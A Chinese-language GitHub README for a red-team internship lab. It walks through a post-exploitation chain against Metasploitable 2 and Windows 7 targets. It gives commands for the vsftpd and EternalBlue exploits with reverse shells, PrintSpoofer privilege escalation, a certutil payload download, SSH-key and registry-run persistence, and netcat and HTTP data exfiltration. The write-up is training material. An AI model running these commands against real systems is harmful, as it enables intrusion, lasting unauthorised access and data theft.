BlackShadow-arch/Post_Exploitation_Privilege_Escalation
GitHub: BlackShadow-arch/Post_Exploitation_Privilege_Escalation
一个红队实习的后渗透实验项目,完整演示了 Linux 和 Windows 平台上从提权到持久化再到数据外传的真实攻击链。
Stars: 0 | Forks: 0
# ⬆️ 第 05 周 — 后渗透与权限提升
**实习生:** Ali Ahsan | **学号:** CSI-B1-427
**项目:** Cyberstar 网络安全红队实习
**导师:** Umar Niaz
**日期:** 2026 年 04 月 06 日
**目标:** Metasploitable 2 (Linux) · Windows 7
## 📌 概述
本周的重点是将权限从低权限账户提升到 Linux 和 Windows 目标上的 root/SYSTEM 权限,建立持久化,以及进行数据窃取 —— 从而完成真实攻击链中的后渗透阶段。
## 🧪 涵盖任务
### 任务 01 — Linux 权限提升
**通过 VSFTPD 后门获取初始访问权限:**
```
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST
exploit
```
**Shell 稳定化:**
```
python -c 'import pty; pty.spawn("/bin/bash")'
```
**手动信息收集:**
```
sudo -l # Check sudo rights
find / -perm -u=s -type f 2>/dev/null # SUID binary search
```
**自动化信息收集:**
- **LinPEAS** — 全面的权限提升枚举工具
- **LSE (Linux Smart Enumeration)** — 通过 verbosity level 2 提供补充上下文
### 任务 02 — Windows 权限提升
**EternalBlue (MS17-010):**
```
use exploit/windows/smb/ms17_010_eternalblue
set RHOST
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
```
**Token Impersonation — PrintSpoofer:**
```
whoami /priv # Confirm SeImpersonatePrivilege
PrintSpoofer.exe -i -c cmd # Spawn SYSTEM shell
```
**自动化信息收集:**
```
certutil -urlcache -f http:///winPEAS.exe winPEAS.exe
powershell -ep bypass
. .\PowerUp.ps1; Invoke-AllChecks
```
### 任务 03 — 建立持久化
**Linux — SSH 密钥注入:**
```
ssh-keygen -t rsa -b 4096 -f ~/.ssh/id_rsa
cat ~/.ssh/id_rsa.pub >> /root/.ssh/authorized_keys
```
**Windows — Registry Run Key:**
```
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Update" /t REG_SZ /d "C:\Users\Public\calc.exe" /f
```
### 任务 04 — 数据窃取
**Netcat 传输:**
```
# 接收方 (Kali):
nc -lvnp 4444 > stolen.txt
# 发送方 (Target):
nc 4444 < secret.txt
```
**Python HTTP Server (拉取式):**
```
python3 -m http.server 8000
wget http://:8000/sensitive_file.txt
```
## 🏆 主要成就
- 在 Linux 上通过 SUID binaries 将权限从 `www-data` 提升至 `root`
- 在 Windows 7 上通过 EternalBlue + PrintSpoofer 获取了 `NT AUTHORITY\SYSTEM` 权限
- 部署并使用了 LinPEAS、LSE、WinPEAS、PowerUp
- 在两个目标上均建立了持久化后门
- 通过 Netcat 和 Python HTTP Server 成功窃取了数据
## 🛠️ 使用的工具
`Metasploit` · `LinPEAS` · `LSE` · `WinPEAS` · `PowerUp` · `PrintSpoofer` · `Netcat` · `Python HTTP Server`
## ⚠️ 免责声明
标签:Web报告查看器, XXE攻击, 协议分析, 数据窃取, 无线安全, 权限提升, 网络安全, 逆向工具, 隐私保护